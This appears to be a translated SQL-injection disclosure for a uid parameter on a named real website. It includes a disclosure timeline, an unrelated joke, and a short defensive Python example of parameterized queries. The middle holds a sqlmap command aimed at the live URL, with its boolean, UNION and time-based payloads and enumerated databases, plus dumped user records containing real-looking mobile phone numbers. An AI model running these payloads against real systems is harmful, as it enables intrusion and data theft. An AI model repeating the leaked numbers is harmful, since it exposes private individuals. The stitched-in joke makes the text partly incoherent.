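2015-05-17: Details reported to the vendor; awaiting vendor handling
2015-05-18: Vendor confirmed; details disclosed to the vendor only
2015-05-19: Vendor fixed the vulnerability and disclosed it proactively; details made public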
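While riding my bike this morning I accidentally clipped the front of the BMW next to me. I fell and lay on the ground for a long while, dazed. The owner got out, squatted beside me and said, disappointed: "Little brother, your staged accident isn't professional enough! The sunlight where you are lying wouldn't momentarily blind the driver, and the straight-line distance between your body and the front of the car is too long, so it's hard to fake a collision injury!" I was stunned and asked how he knew so much. He patted the BMW and said: "How do you think I got this?"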
I looked at tables of this kind; they all hold user names and similar information.
Data Found: userinfo_id=62889
Data Found: Address=
Data Found: mobile=13811816153
Data Found: userinfo_id=106550
Data Found: Address=
Data Found: mobile=13910892801
Data Found: userinfo_id=150607
These are just a few entries. There are too many tables like this, so I only dumped a tiny bit.
F:\Python26\sqlmap>sqlmap.py -u "http://liren.55bbs.com/files/panteneclinicare/show.php?uid=490614" --dbs

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:54:11

[19:54:11] [WARNING] using 'C:\Users\Administrator\.sqlmap\output' as the output directory
[19:54:12] [INFO] resuming back-end DBMS 'mysql'
[19:54:12] [INFO] testing connection to the target URL
[19:54:12] [INFO] heuristics detected web page charset 'ISO-8859-2'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: uid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: uid=490614' AND 4288=4288 AND 'YuWU'='YuWU

    Type: UNION query
    Title: MySQL UNION query (NULL) - 17 columns
    Payload: uid=-8983' UNION ALL SELECT NULL,CONCAT(0x71796f7471,0x4d6e4d4b7a57666f4566,0x7170637571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: uid=490614' AND SLEEP(5) AND 'Elkx'='Elkx
---
[19:54:12] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.25, PHP 5.3.27
back-end DBMS: MySQL 5.0.11
[19:54:12] [INFO] fetching database names
[19:54:12] [INFO] the SQL query used returns 3 entries
[19:54:12] [INFO] resumed: "information_schema","information_schema"
[19:54:12] [INFO] resumed: "55user","55user"
[19:54:12] [INFO] resumed: "test","test"
available databases [3]:
[*] 55user
[*] information_schema
[*] test

[19:54:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\liren.55bbs.com'

[*] shutting down at 19:54:12
Added up, it is just as 紫霞仙子 said: there should be over a million. Pity you didn't record whether they are male or female.
Filtering
Severity: High
Vulnerability Rank: 20
Confirmed at: 2015-05-18 11:21
The vulnerability exists; awaiting a fix
2015-05-19: The vulnerability has been fixed
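
Added example (not code from the report or from the vendor): for an injectable numeric parameter such as `uid`, this sketch compares a string-concatenated query with a bound parameter and an allow-list type check, using the boolean-based payload shown in the sqlmap output. The `userinfo` schema, the rows and all function names are constructed for illustration, and SQLite stands in for the site's MySQL.

```python
import sqlite3

# Boolean-based payload for the uid parameter, copied from the sqlmap output above.
PAGE_PAYLOAD = "490614' AND 4288=4288 AND 'YuWU'='YuWU"

def make_db():
    """Constructed in-memory table (hypothetical schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE userinfo (uid INTEGER, name TEXT)")
    db.executemany("INSERT INTO userinfo VALUES (?, ?)",
                   [(490614, "alice"), (490615, "bob")])
    return db

def lookup_concat(db, raw_uid):
    """'Before' form: the request value becomes part of the SQL text."""
    sql = "SELECT name FROM userinfo WHERE uid = '" + raw_uid + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_bound(db, uid):
    """Bound parameter: the value is only ever data, never SQL syntax."""
    cur = db.execute("SELECT name FROM userinfo WHERE uid = ?", (uid,))
    return [row[0] for row in cur]

def parse_uid(raw_uid):
    """Allow-list check: a short run of ASCII digits, nothing else."""
    if not (raw_uid.isascii() and raw_uid.isdigit() and len(raw_uid) <= 10):
        raise ValueError("uid must be a decimal integer")
    return int(raw_uid)

def lookup_hardened(db, raw_uid):
    """Validate the type first, then query with a bound parameter."""
    return lookup_bound(db, parse_uid(raw_uid))

if __name__ == "__main__":
    db = make_db()
    # Concatenation: the quote in the payload closes the literal, so the
    # trailing AND clauses are parsed and evaluated as SQL.
    print("concat  :", lookup_concat(db, PAGE_PAYLOAD))
    # Bound parameter: the whole payload is compared as one string, no match.
    print("bound   :", lookup_bound(db, PAGE_PAYLOAD))
    try:
        lookup_hardened(db, PAGE_PAYLOAD)
    except ValueError as exc:
        print("hardened:", exc)
```

The type check rejects the request before it reaches the database, and the bound parameter keeps the query structure fixed even if a check is later loosened, which a character filter alone does not guarantee.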